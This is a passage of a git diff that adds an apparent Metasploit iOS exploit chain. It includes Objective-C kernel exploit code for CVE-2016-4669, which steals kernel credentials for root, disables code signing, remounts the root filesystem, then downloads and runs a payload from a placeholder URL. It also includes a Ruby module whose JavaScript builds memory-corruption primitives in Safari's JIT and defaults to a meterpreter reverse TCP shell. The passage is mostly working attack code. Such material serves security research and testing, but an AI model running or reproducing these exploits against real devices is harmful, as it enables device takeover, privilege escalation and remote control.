0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
+
+static struct {
+	addr_t amfi_allow_any_signature;
+	addr_t cs_enforcement_disable;
+	addr_t p_rootvnode;
+	addr_t base;
+} koffsets = {
+	.amfi_allow_any_signature = 0x807c3b30,
+	.cs_enforcement_disable = 0x807c3b38,
+	.p_rootvnode = 0x8038c1b4,
+	.base = 0x80001000
+};
+
+
+addr_t get_port_addr(addr_t space, mach_port_t port)
+{
+	addr_t is_table_size;
+	addr_t is_table;
+	addr_t addr;
+
+	is_table_size = kr32(space + SPACE_is_table_size);
+	is_table = kr32(space + SPACE_is_table);
+	addr = kr32(is_table + (port >> 8)*0x10);
+
+	return addr;
+}
+
+addr_t proc_for_pid(addr_t self_proc, int pid)
+{
+	addr_t next = kr32(self_proc);
+	while (next != self_proc) {
+		int _pid = kr32(next + 8);
+		if (_pid == pid) {
+			return next;
+		}
+		next = kr32(next);
+	}
+
+	return 0;
+}
+
+int remount_root_rw(addr_t slide)
+{
+	addr_t rootvnode = kr32(koffsets.p_rootvnode + slide);
+	addr_t v_mount = kr32(rootvnode + VNODE_v_mount);
+
+	uint32_t mnt_flags = kr32(v_mount + MOUNT_mnt_flags);
+	kw32(v_mount + MOUNT_mnt_flags, mnt_flags & ~(MNT_ROOTFS | MNT_RDONLY));
+
+	char* nmz = strdup("/dev/disk0s1s1");
+	int ret = mount("hfs", "/", MNT_UPDATE, (void*)&nmz);
+	if (ret < 0) {
+		NSLog(@"mount failed ret: %d", ret);
+		return -1;
+	}
+
+	NSLog(@"root fs mounted r/w");
+	kw32(v_mount + MOUNT_mnt_flags, mnt_flags & ~MNT_RDONLY);
+	return 0;
+}
+
+int remount_root_ro(addr_t slide)
+{
+	addr_t rootvnode = kr32(koffsets.p_rootvnode + slide);
+	addr_t v_mount = kr32(rootvnode + VNODE_v_mount);
+
+	uint32_t mnt_flags = kr32(v_mount + MOUNT_mnt_flags);
+	mnt_flags |= MNT_RDONLY;
+	mnt_flags &= ~MNT_ROOTFS;
+
+	kw32(v_mount + MOUNT_mnt_flags, mnt_flags);
+
+	char* nmz = strdup("/dev/disk0s1s1");
+	int ret = mount("hfs", "/", MNT_UPDATE, (void*)&nmz);
+	if (ret < 0) {
+		NSLog(@"mount failed ret: %d", ret);
+		return -1;
+	}
+	NSLog(@"root fs mounted ro");
+
+	kw32(v_mount + MOUNT_mnt_flags, mnt_flags | MNT_ROOTFS);
+	return 0;
+}
+
+void deploy()
+{
+	download(PAYLOAD_URL_PLACEHOLDER, "/bin/m");
+
+	pid_t pid = 0;
+	char *path = "/bin/m";
+	char *args[] = {path, NULL};
+	int ret = posix_spawn(&pid, path, 0, 0, args, NULL);
+	if (ret < 0) {
+		NSLog(@"posix_spawn failed: %d", ret);
+		return;
+	}
+	waitpid(pid, 0, 0);
+	NSLog(@"shell deployed");
+}
+
+void shell_main(addr_t self_space, addr_t slide)
+{
+	addr_t self_addr = get_port_addr(self_space, mach_task_self());
+	NSLog(@"self_addr: %lx", self_addr);
+
+	addr_t self_task = kr32(self_addr + IPC_PORT_kobject);
+	NSLog(@"self_task: %lx", self_task);
+
+	addr_t self_proc = kr32(self_task + TASK_bsd_proc);
+	NSLog(@"self_proc: %lx", self_proc);
+
+	addr_t kernel_proc = proc_for_pid(self_proc, 0);
+	NSLog(@"kernel_proc: %lx", kernel_proc);
+
+	// privilege escalation from [1]
+	addr_t self_ucred = kr32(self_proc + PROC_ucred);
+	addr_t kernel_cred = kr32(kernel_proc + PROC_ucred);
+	kw32(self_proc + PROC_ucred, kernel_cred);
+
+	NSLog(@"got root uid: %d, gid: %d", getuid(), getgid());
+
+	//uint32_t cs_enforcement_disable = 0;
+	//size_t kernel_size = 0x1000000;
+	//void *kernel = malloc(kernel_size);
+	//if (kernel) {
+		//kread(koffsets.base + slide, kernel, kernel_size);
+		//NSLog(@"got %zu kernel bytes xx", kernel_size);
+		//cs_enforcement_disable = find_cs_enforcement_disable_amfi(0, kernel, kernel_size);
+	//} else {
+		//NSLog(@"malloc kernel_size failed");
+	//}
+	//if (cs_enforcement_disable != 0) {
+		//NSLog(@"patchfinder got cs_enforcement_disable: %lx",
+				//cs_enforcement_disable + koffsets.base + slide);
+		//koffsets.cs_enforcement_disable = cs_enforcement_disable + koffsets.base;
+		//koffsets.amfi_allow_any_signature = koffsets.cs_enforcement_disable - 8;
+	//} else {
+	NSLog(@"patchfinder skipped!! using hardcoded offsets");
+	//}
+	//free(kernel);
+	// disable code signing by overwriting kernel arguments
+	// as described in [2]
+	//
+	// defeats
+	// outside of container && !i_can_has_debugger
+	kw32(koffsets.amfi_allow_any_signature + slide, 1);
+	kw32(koffsets.cs_enforcement_disable + slide, 1);
+
+	// root file system remount from [1]
+	remount_root_rw(slide);
+	deploy();
+	remount_root_ro(slide);
+
+	// restore credentials
+	kw32(self_proc + PROC_ucred, self_ucred);
+}
+
+
+
diff --git a/external/source/exploits/CVE-2016-4669/task.c b/external/source/exploits/CVE-2016-4669/task.c
new file mode 100644
index 0000000000..e9fc06a1f2
--- /dev/null
+++ b/external/source/exploits/CVE-2016-4669/task.c
@@ -0,0 +1,206 @@
+#include "__task.h"
+
+#ifndef	UseStaticTemplates
+#define	UseStaticTemplates	0
+#endif	/* UseStaticTemplates */
+
+#ifndef	__MachMsgErrorWithoutTimeout
+#define	__MachMsgErrorWithoutTimeout(_R_) { \
+	switch (_R_) { \
+	case MACH_SEND_INVALID_DATA: \
+	case MACH_SEND_INVALID_DEST: \
+	case MACH_SEND_INVALID_HEADER: \
+		mig_put_reply_port(InP->Head.msgh_reply_port); \
+		break; \
+	default: \
+		mig_dealloc_reply_port(InP->Head.msgh_reply_port); \
+	} \
+}
+#endif	/* __MachMsgErrorWithoutTimeout */
+
+#ifndef	__AfterSendRpc
+#define	__AfterSendRpc(_NUM_, _NAME_)
+#endif	/* __AfterSendRpc */
+
+#ifndef	__BeforeSendRpc
+#define	__BeforeSendRpc(_NUM_, _NAME_)
+#endif	/* __BeforeSendRpc */
+
+#define msgh_request_port	msgh_remote_port
+#define msgh_reply_port		msgh_local_port
+
+#ifndef	mig_internal
+#define	mig_internal	static __inline__
+#endif	/* mig_internal */
+
+#ifndef	mig_external
+#define mig_external
+#endif	/* mig_external */
+
+#if	!defined(__MigTypeCheck) && defined(TypeCheck)
+#define	__MigTypeCheck		TypeCheck	/* Legacy setting */
+#endif	/* !defined(__MigTypeCheck) */
+
+#ifndef	__DeclareSendRpc
+#define	__DeclareSendRpc(_NUM_, _NAME_)
+#endif	/* __DeclareSendRpc */
+
+mig_internal kern_return_t __MIG_check__Reply__mach_ports_register_t(__Reply__mach_ports_register_t *Out0P)
+{
+
+	typedef __Reply__mach_ports_register_t __Reply __attribute__((unused));
+	if (Out0P->Head.msgh_id != 3503) {
+	    if (Out0P->Head.msgh_id == MACH_NOTIFY_SEND_ONCE)
+		{ return MIG_SERVER_DIED; }
+	    else
+		{ return MIG_REPLY_MISMATCH; }
+	}
+
+#if	__MigTypeCheck
+	if ((Out0P->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX) ||
+	    (Out0P->Head.msgh_size != (mach_msg_size_t)sizeof(__Reply)))
+		{ return MIG_TYPE_ERROR ; }
+#endif	/* __MigTypeCheck */
+
+	{
+		return Out0P->RetCode;
+	}
+}
+
+/* Routine mach_ports_register */
+mig_external kern_return_t __mach_ports_register
+(
+	task_t target_task,
+	mach_port_array_t init_port_set,
+	mach_msg_type_number_t init_port_setCnt
+)
+{
+
+#ifdef  __MigPackStructs
+#pragma pack(4)
+#endif
+	typedef struct {
+		mach_msg_header_t Head;
+		/* start of the kernel processed data */
+		mach_msg_body_t msgh_body;
+		mach_msg_ool_ports_descriptor_t init_port_set;
+		/* end of the kernel processed data */
+		NDR_record_t NDR;
+		mach_msg_type_number_t init_port_setCnt;
+	} Request __attribute__((unused));
+#ifdef  __MigPackStructs
+#pragma pack()
+#endif
+
+#ifdef  __MigPackStructs
+#pragma pack(4)
+#endif
+	typedef struct {
+		mach_msg_header_t Head;
+		NDR_record_t NDR;
+		kern_return_t RetCode;
+		mach_msg_trailer_t trailer;
+	} Reply __attribute__((unused));
+#ifdef  __MigPackStructs
+#pragma pack()
+#endif
+
+#ifdef  __MigPackStructs
+#pragma pack(4)
+#endif
+	typedef struct {
+		mach_msg_header_t Head;
+		NDR_record_t NDR;
+		kern_return_t RetCode;
+	} __Reply __attribute__((unused));
+#ifdef  __MigPackStructs
+#pragma pack()
+#endif
+	/*
+	 * typedef struct {
+	 * 	mach_msg_header_t Head;
+	 * 	NDR_record_t NDR;
+	 * 	kern_return_t RetCode;
+	 * } mig_reply_error_t;
+	 */
+
+	union {
+		Request In;
+		Reply Out;
+	} Mess;
+
+	Request *InP = &Mess.In;
+	Reply *Out0P = &Mess.Out;
+
+	mach_msg_return_t msg_result;
+
+#ifdef	__MIG_check__Reply__mach_ports_register_t__defined
+	kern_return_t check_result;
+#endif	/* __MIG_check__Reply__mach_ports_register_t__defined */
+
+	__DeclareSendRpc(3403, "mach_ports_register")
+
+#if	UseStaticTemplates
+	const static mach_msg_ool_ports_descriptor_t init_port_setTemplate = {
+		/* addr = */		(void *)0,
+		/* coun = */		0,
+		/* deal = */		FALSE,
+		/* copy is meaningful only in overwrite mode */
+		/* copy = */		MACH_MSG_PHYSICAL_COPY,
+		/* disp = */		19,
+		/* type = */		MACH_MSG_OOL_PORTS_DESCRIPTOR,
+	};
+#endif	/* UseStaticTemplates */
+
+	InP->msgh_body.msgh_descriptor_count = 1;
+#if	UseStaticTemplates
+	InP->init_port_set = init_port_setTemplate;
+	InP->init_port_set.address = (void *)(init_port_set);
+	InP->init_port_set.count = 2; // was init_port_setCnt;
+#else	/* UseStaticTemplates */
+	InP->init_port_set.address = (void *)(init_port_set);
+	InP->init_port_set.count = 2; // was init_port_setCnt;
+	InP->init_port_set.disposition = 19;
+	InP->init_port_set.deallocate =  FALSE;
+	InP->init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+#endif	/* UseStaticTemplates */
+
+
+	InP->NDR = NDR_record;
+
+	InP->init_port_setCnt = init_port_setCnt;
+
+	InP->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|
+		MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+	/* msgh_size passed as argument */
+	InP->Head.msgh_request_port = target_task;
+	InP->Head.msgh_reply_port = mig_get_reply_port();
+	InP->Head.msgh_id = 3403;
+	
+/* BEGIN VOUCHER CODE */
+
+#ifdef USING_VOUCHERS
+	if (voucher_mach_msg_set != NULL) {
+		voucher_mach_msg_set(&InP->Head);
+	}
+#endif // USING_VOUCHERS
+	
+/* END VOUCHER CODE */
+
+	__BeforeSendRpc(3403, "mach_ports_register")
+	msg_result = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_reply_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+	__AfterSendRpc(3403, "mach_ports_register")
+	if (msg_result != MACH_MSG_SUCCESS) {
+		__MachMsgErrorWithoutTimeout(msg_result);
+		{ return msg_result; }
+	}
+
+
+#if	defined(__MIG_check__Reply__mach_ports_register_t__defined)
+	check_result = __MIG_check__Reply__mach_ports_register_t((__Reply__mach_ports_register_t *)Out0P);
+	if (check_result != MACH_MSG_SUCCESS)
+		{ return check_result; }
+#endif	/* defined(__MIG_check__Reply__mach_ports_register_t__defined) */
+
+	return KERN_SUCCESS;
+}
diff --git a/external/source/exploits/CVE-2016-4669/utils.h b/external/source/exploits/CVE-2016-4669/utils.h
new file mode 100644
index 0000000000..85f90bd87e
--- /dev/null
+++ b/external/source/exploits/CVE-2016-4669/utils.h
@@ -0,0 +1,46 @@
+#ifndef UTILS_H
+#define UTILS_H
+
+@import Foundation;
+#include <stdio.h>
+#include <dlfcn.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/attr.h>
+#include <mach/mach.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/mount.h>
+#include <spawn.h>
+#include <sys/sysctl.h>
+#include <sys/types.h>          /* See NOTES */
+#include <sys/socket.h>
+
+#include <stdint.h>
+#include <CoreFoundation/CoreFoundation.h>
+
+typedef mach_port_t io_object_t;
+typedef io_object_t io_iterator_t;
+typedef io_object_t io_service_t;
+typedef char * io_buf_ptr_t;
+typedef uintptr_t addr_t;
+
+void for_other_threads(void (^handler)(thread_act_t thread));
+void set_nofile_limit();
+int download(char *src, char *dest);
+mach_port_t alloc_port();
+kern_return_t kalloc_ool_ports(mach_port_t port, mach_port_t ool_port, size_t cnt);
+kern_return_t kalloc_page_ool_ports(mach_port_t port);
+kern_return_t kalloc_8_ool_ports(mach_port_t port, mach_port_t ool_port);
+void discard_message(mach_port_t port);
+void hexdump(void *ptr, size_t n);
+int pipe_create(int fds[2]);
+int pipe_alloc(int fds[2], void *buf, size_t size);
+void pipes_close(int *pipes, size_t count);
+int pipes_create(int *pipes, size_t count);
+int pipes_alloc(int *pipes, size_t count, char *pipe_buf);
+
+#endif
diff --git a/external/source/exploits/CVE-2016-4669/utils.m b/external/source/exploits/CVE-2016-4669/utils.m
new file mode 100644
index 0000000000..3592f621c6
--- /dev/null
+++ b/external/source/exploits/CVE-2016-4669/utils.m
@@ -0,0 +1,248 @@
+// [1] https://github.com/externalist/exploit_playground/blob/master/empty_list/empty_list/empty_list/sploit.c
+#include "utils.h"
+
+void for_other_threads(void (^handler)(thread_act_t thread))
+{
+	thread_act_t thread_self = mach_thread_self();
+	thread_act_port_array_t list;
+	mach_msg_type_number_t count;
+	kern_return_t kr = 0;
+
+	kr = task_threads(mach_task_self(), &list, &count);
+	if (kr != KERN_SUCCESS) {
+		NSLog(@"task_threads failed");
+		return;
+	}
+
+	for (int i=0; i<count; i++) {
+		if (list[i] != thread_self) {
+			handler(list[i]);	
+		}
+	}
+}
+
+void set_nofile_limit()
+{
+	int ret;
+	struct rlimit rlim;
+	ret = getrlimit(RLIMIT_NOFILE, &rlim);
+	if (ret < 0) {
+		NSLog(@"getresuid failed errno: %d", errno);
+		exit(-1);
+	}
+	NSLog(@"nofile limit: %llx %llx", rlim.rlim_cur, rlim.rlim_max);
+
+	rlim.rlim_cur = 0x2000;
+	ret = setrlimit(RLIMIT_NOFILE, &rlim);
+	if (ret < 0) {
+		NSLog(@"setrlimit failed errno: %d", errno);
+		exit(-1);
+	}
+	NSLog(@"set new nofile limit: %llx", rlim.rlim_cur);
+}
+
+NSData *download_data(NSString *_url)
+{
+	NSURL  *url = [NSURL URLWithString:_url];
+	NSLog(@"get %@", url);
+	NSData *urlData = [NSData dataWithContentsOfURL:url];
+	if (urlData != nil)
+		NSLog(@"got remote len: %d", [urlData length]);
+	else
+		NSLog(@"could not get %@", url);
+
+	return urlData;
+}
+
+int download(char *src, char *dest)
+{
+	NSString *url = [NSString stringWithUTF8String:src];
+	NSData *data = download_data(url);
+	if (data == nil)
+		return -1;
+
+	unlink(dest);
+	sync();
+
+	int fd = open(dest, O_CREAT | O_RDWR, 
+		       	S_IRUSR | S_IXUSR | S_IWUSR |
+			S_IRGRP | S_IXGRP |
+			S_IROTH | S_IXOTH
+		     ); 
+	if (fd < 0) {
+		NSLog(@"could not open %s", dest);
+		return -1;
+	}
+
+	int ret = write(fd, [data bytes], [data length]);
+	NSLog(@"saved to %s, write ret: %d", dest, ret);
+	close(fd);
+
+	sync();
+
+	return 0;
+}
+
+mach_port_t alloc_port()
+{
+	kern_return_t err;
+	mach_port_t port = MACH_PORT_NULL;
+
+	err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
+	if (err != KERN_SUCCESS) {
+		NSLog(@"mach_port_allocate failed to allocate a port");
+	}
+
+	// insert a send right:
+	err = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
+	if (err != KERN_SUCCESS) {
+		NSLog(@"mach_port_insert_right failed");
+	}
+
+	return port;
+}
+
+// Controlled kernel memory allocations used below
+// are taken from [1] and described there in great details.
+typedef struct 
+{
+	mach_msg_header_t hdr;
+	mach_msg_body_t body;
+	mach_msg_ool_ports_descriptor_t ool_ports;
+	uint8_t pad[0x200];
+} kalloc_mach_msg_t;
+
+kern_return_t kalloc_ool_ports(mach_port_t port, mach_port_t ool_port, size_t cnt)
+{
+	kern_return_t err;
+	kalloc_mach_msg_t kalloc_msg = {0};
+	uint32_t msg_size = sizeof(kalloc_msg);
+	// send a message with two OOL NULL ports; these will end up in a kalloc.16:
+
+	kalloc_msg.hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
+	kalloc_msg.hdr.msgh_size = msg_size; //sizeof(struct kalloc_16_send_msg);
+	kalloc_msg.hdr.msgh_remote_port = port;
+	kalloc_msg.hdr.msgh_local_port = MACH_PORT_NULL;
+	kalloc_msg.hdr.msgh_id = 0x41414141;
+
+	kalloc_msg.body.msgh_descriptor_count = 1;
+	mach_port_t ports[cnt]; 
+	for (int i=0; i<cnt; i++) {
+		ports[i] = ool_port;
+	}
+
+	kalloc_msg.ool_ports.address = ports;
+	kalloc_msg.ool_ports.count = cnt;
+	kalloc_msg.ool_ports.deallocate = 0;
+	kalloc_msg.ool_ports.disposition = MACH_MSG_TYPE_COPY_SEND;
+	kalloc_msg.ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+	kalloc_msg.ool_ports.copy = MACH_MSG_PHYSICAL_COPY;
+
+	err = mach_msg(&kalloc_msg.hdr,
+			MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+			(mach_msg_size_t)msg_size,
+			0,
+			MACH_PORT_NULL,
+			MACH_MSG_TIMEOUT_NONE,
+			MACH_PORT_NULL);
+
+	if (err != KERN_SUCCESS) {
+		NSLog(@"sending kalloc.8 message failed %s\n", mach_error_string(err));
+	}
+
+	return err;
+}
+
+kern_return_t kalloc_page_ool_ports(mach_port_t port)
+{
+	return kalloc_ool_ports(port, MACH_PORT_NULL, PAGE_SIZE/4);
+}
+
+kern_return_t kalloc_8_ool_ports(mach_port_t port, mach_port_t ool_port)
+{
+	return kalloc_ool_ports(port, ool_port, 2);
+}
+
+void discard_message(mach_port_t port)
+{
+	static int8_t msg_buf[0x4000];
+	mach_msg_header_t* msg = (mach_msg_header_t*)msg_buf;
+	kern_return_t err;
+	err = mach_msg(msg,
+			MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, // no timeout
+			0,
+			sizeof(msg_buf),
+			port,
+			0,
+			0);
+	if (err != KERN_SUCCESS){
+		NSLog(@"error receiving on port: %s\n", mach_error_string(err));
+	}
+
+	mach_msg_destroy(msg);
+}
+
+void hexdump(void *ptr, size_t n)
+{
+	uint32_t *u32 = ptr;
+
+	for (int i=0; i<n; i+=2) {
+		NSLog(@"%08X %08X", u32[i], u32[i+1]);
+	}
+}
+
+int pipe_create(int fds[2])
+{
+	int ret = pipe(fds);
+	if (ret < 0) {
+		NSLog(@"pipe allocation failed errno: %d", errno);
+		return -1;
+	}
+
+	return 0;
+}
+
+int pipe_alloc(int fds[2], void *buf, size_t size)
+{
+	int ret = write(fds[1], buf, size);
+	if (ret < 0) {
+		NSLog(@"pipe write failed, fd: %d, errno: %d", fds[1], errno);
+		return -1;
+	}
+
+	return 0;
+}
+
+void pipes_close(int *pipes, size_t count)
+{
+	for (int i=0; i<count; i++) {
+		if (pipes[i*2] != -1) {
+			close(pipes[i*2]);
+			close(pipes[i*2+1]);
+		}
+	}
+}
+
+int pipes_create(int *pipes, size_t count)
+{
+	for (int i=0; i<count; i++) {
+		if (pipe_create(&pipes[i*2]) < 0) {
+			return -1;
+		}
+	}
+
+	return 0;
+}
+
+int pipes_alloc(int *pipes, size_t count, char *pipe_buf)
+{
+	for (int i=0; i<count; i++) {
+		if (pipe_alloc(&pipes[i*2], pipe_buf, PAGE_SIZE-1) < 0) {
+			NSLog(@"pipe alloc failed at %d", i);
+			return -1;
+		}
+	}
+
+	return 0;
+}
+
diff --git a/modules/exploits/apple_ios/browser/safari_jit.rb b/modules/exploits/apple_ios/browser/safari_jit.rb
new file mode 100644
index 0000000000..1d6133bfea
--- /dev/null
+++ b/modules/exploits/apple_ios/browser/safari_jit.rb
@@ -0,0 +1,549 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Safari JIT Exploit',
+        'Description' => %q{
+          This module exploits a JIT optimisation bug in Safari Webkit. This allows us to
+          write shellcode to an RWX memory section in JavaScriptCore and execute it. The
+          shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel rw,
+          obtains root and disables code signing. Finally we download and execute the
+          meterpreter payload.
+          This module has been tested against iOS 7.1.2 on an iPhone 4.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'kudima', # ishell
+          'Ian Beer', # CVE-2016-4669
+          'WanderingGlitch', # CVE-2018-4162
+          'timwr', # metasploit integration
+        ],
+        'References' => [
+          ['CVE', '2016-4669'],
+          ['CVE', '2018-4162'],
+          ['URL', 'https://github.com/kudima/exploit_playground/tree/master/iPhone3_1_shell'],
+          ['URL', 'https://www.thezdi.com/blog/2018/4/12/inverting-your-assumptions-a-guide-to-jit-comparisons'],
+          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=882'],
+        ],
+        'Arch' => ARCH_ARMLE,
+        'Platform' => 'apple_ios',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/armle/meterpreter_reverse_tcp' },
+        'Targets' => [[ 'Automatic', {} ]],
+        'DisclosureDate' => 'Aug 25 2016'
+      )
+    )
+    register_options(
+      [
+        OptPort.new('SRVPORT', [ true, 'The local port to listen on.', 8080 ]),
+        OptString.new('URIPATH', [ true, 'The URI to use for this exploit.', '/' ])
+      ]
+    )
+  end
+
+  def exploit_js
+    <<~JS
+      //
+      // Initial notes.
+      //
+      // If we look at publicly available exploits for this kind of
+      // issues [2], [3] on 64-bit systems, they rely on that JavaScriptCore
+      // differently interprets the content of arrays based on
+      // their type, besides object pointers and 64-bit doubles may have
+      // the same representation.
+      //
+      // This is not the case for 32-bit version of JavaScriptCore.
+      // The details are in runtime/JSCJSValue.h. All JSValues are still
+      // 64-bit, but for the cells representing objects
+      // the high 32-bit are always 0xfffffffb (since we only need 32-bit
+      // to represent a pointer), meaning cell is always a NaN in IEEE754
+      // representation used for doubles and it is not possible to confuse
+      // an cell and a IEEE754 encoded double value.
+      //
+      // Another difference is how the cells are represented
+      // in the version of JavaScriptCore by iOS 7.1.2.
+      // The type of the cell object is determined by m_structure member
+      // at offset 0 which is a pointer to Structure object.
+      // On 64-bit systems, at the time [2], [3]
+      // were published, a 32-bit integer value was used as a structure id.
+      // And it was possible to deterministically predict that id for
+      // specific object layout.
+      //
+      // The exploit outline.
+      //
+      // Let's give a high level description of the steps taken by the
+      // exploit to get to arbitrary code execution.
+      //
+      // 1. We use side effect bug to overwrite butterfly header by confusing
+      // Double array with ArrayStorage and obtain out of bound (oob) read/write
+      // into array butterflies allocation area.
+      //
+      // 2. Use oob read/write to build addrOf/materialize object primitives,
+      // by overlapping ArrayStorage length with object pointer part of a cell
+      // stored in Contiguous array.
+      //
+      // 3. Craft a fake Number object in order to leak real object structure
+      // pointer via a runtime function.
+      //
+      // 4. Use leaked structure pointer to build a fake fake object allowing
+      // as read/write access to a Uint32Array object to obtain arbitrary read/write.
+      //
+      // 5. We overwrite rwx memory used for jit code and redirect execution
+      // to that memory using our arbitrary read/write.
+
+      var log_el = "";
+
+      function log(msg) {
+        log_el += msg + "\\n";
+      }
+
+      function logFinalize() {
+        alert(log_el);
+      }
+
+      function main(loader, macho) {
+
+        // auxillary arrays to facilitate
+        // 64-bit floats to pointers conversion
+        var ab  = new ArrayBuffer(8)
+        var u32 = new Uint32Array(ab);
+        var f64 = new Float64Array(ab);
+
+        function toF64(hi, lo) {
+          u32[0] = hi;
+          u32[1] = lo;
+          return f64[0];
+        }
+
+        function toHILO(f) {
+          f64[0] = f;
+          return [u32[0], u32[1]]
+        }
+
+        function printF64(f) {
+          var u32 = toHILO(f);
+          return (u32[0].toString(16) + " " + u32[1].toString(16));
+        }
+
+        // arr is an object with a butterfly
+        //
+        // cmp is an object we compare with
+        //
+        // v is a value assigned to an indexed property,
+        // gives as ability to change the butterfly
+        function oob_write(arr, cmp, v, i) {
+          arr[0] = 1.1;
+          // place a comparison with an object,
+          // incorrectly modeled as side effects free
+          cmp == 1;
+          // if i less then the butterfly length,
+          // it simply writes the value, otherwise
+          // bails to baseline jit, which is going to
+          // handle the write via a slow path.
+          arr[i] = v;
+          return arr[0];
+        }
+
+        function make_oob_array() {
+
+          var oob_array;
+
+          // allocate an object
+          var arr = {};
+          arr.p = 1.1;
+          // allocate butterfly of size 0x38,
+          // 8 bytes header and 6 elements. To get the size
+          // we create an array and inspect its memory
+          // in jsc command line interpreter.
+          arr[0] = 1.1;
+
+          // toString is triggered during comparison,
+          var x = {toString: function () {
+              // convert the butterfly into an
+              // array storage with two values,
+              // initial 1.1 64-bit at 0 is going to be placed
+              // to m_vector and value at 1000 is placed into
+              // the m_sparceMap
+              arr[1000] = 2.2;
+              // allocate a new butterfly right after
+              // our ArrayStorage. The butterflies are
+              // allocated continuously regardless
+              // of the size. For the array we
+              // get 0x28 bytes, header and 4 elements.
+              oob_array = [1.1];
+              return '1';
+            }
+          };
+
+          // ArrayStorage buttefly--+
+          //                        |
+          //                        V
+          //-8       -4             0             4
+          //  | pub length | length | m_sparceMap |  m_indexBias |
+          //
+          // 8                    0xc        0x10
+          // | m_numValuesInVector | m_padding | m_vector[0]
+          //
+          //0x18         0x20        0x28
+          // | m_vector[1] | m_vector[2] | m_vector[3]  |
+          //
+          //              oob_array butterfly
+          //                       |
+          //                       V
+          //0x30     0x34         0x38   0x40     0x48      0x50
+          // | pub length | length |  el0 |   el1   |   el2   |
+          //
+
+          // We enter the function with arr butterfly
+          // backed up by a regular butterfly, during the side effect
+          // in toString method we turn it into an ArrayStorage,
+          // and allocate a butterfly right after it. So we
+          // hopefully get memory layout as on the diagram above.
+          //
+          // The compiled code for oob_write, being not aware of the
+          // shape change, is going to compare 6 to the ArrayStorage
+          // length (which we set to 1000 in toString) and proceed
+          // to to write at index 6 relative to ArrayStorage butterfly,
+          // overwriting the oob_array butterfly header with 64-bit float
+          // encoded as 0x0000100000001000. Which gives as ability to write
+          // out of bounds of oob_array up to 0x1000 bytes, hence
+          // the name oob_array.
+
+          var o = oob_write(arr, x, toF64(0x1000, 0x1000), 6);
+
+          return oob_array;
+        }
+
+        // returns address of an object
+        function addrOf(o) {
+          // overwrite ArrayStorage public length
+          // with the object pointer
+          oob_array[4] = o;
+          // retrieve the address as ArrayStorage
+          // butterfly public length
+          var r = oobStorage.length;
+          return r;
+        }
+
+        function materialize(addr) {
+          // replace ArrayStorage public length
+          oobStorage.length = addr;
+          // retrieve the placed address
+          // as an object
+          return oob_array[4];
+        }
+
+        function read32(addr) {
+          var lohi = toHILO(rw0Master.rw0_f2);
+          // replace m_buffer with our address
+          rw0Master.rw0_f2 = toF64(lohi[0], addr);
+          var ret = u32rw[0];
+          // restore
+          rw0Master.rw0_f2 = toF64(lohi[0], lohi[1]);
+          return ret;
+        }
+
+        function write32(addr, v) {
+          var lohi = toHILO(rw0Master.rw0_f2);
+          rw0Master.rw0_f2 = toF64(lohi[0], addr);
+          // for some reason if we don't do this
+          // and the value is negative as a signed int ( > 0x80000000)
+          // it takes base from a different place
+          u32rw[0] = v & 0xffffffff;
+          rw0Master.rw0_f2 = toF64(lohi[0], lohi[1]);
+        }
+
+        function testRW32() {
+          var o = [1.1];
+
+          log("--------------- testrw32 -------------");
+          log("len: " + o.length);
+
+          var bfly = read32(addrOf(o)+4);
+          log("bfly: " + bfly.toString(16));
+
+          var len = read32(bfly-8);
+          log("bfly len: " + len.toString(16));
+          write32(bfly - 8, 0x10);
+          var ret = o.length == 0x10;
+          log("len: " + o.length);
+          write32(bfly - 8, 1);
+          log("--------------- testrw32 -------------");
+          return ret;
+        }
+
+        // dump @len dword
+        function dumpAddr(addr, len) {
+          var output = 'addr: ' + addr.toString(16) + "\\n";
+          for (var i=0; i<len; i++) {
+            output += read32(addr + i*4).toString(16) + " ";
+            if ((i+1) % 2 == 0) {
+              output += "\\n";
+            }
+          }
+          return output;
+        }
+
+        // prepare the function we are going to
+        // use to run our macho loader
+        exec_code = "var o = {};";
+        for (var i=0; i<200; i++) {
+          exec_code += "o.p = 1.1;";
+        }
+        exec_code += "if (v) alert('exec');";
+
+        var exec = new Function('v', exec_code);
+
+        // force JavaScriptCore to generate jit code
+        // for the function
+        for (var i=0; i<1000; i++)
+          exec();
+
+        // create an object with a Double array butterfly
+        var arr = {};
+        arr.p = 1.1;
+        arr[0] = 1.1;
+
+        // force DFG optimization for oob_write function,
+        // with a write beyond the allocated storage
+        for (var i=0; i<10000; i++) {
+          oob_write(arr, {}, 1.1, 1);
+        }
+
+        // prepare a double array which we are going to turn
+        // into an ArrayStorage later on.
+        var oobStorage = [];
+        oobStorage[0] = 1.1;
+
+        // create an array with oob read/write
+        // relative to its butterfly
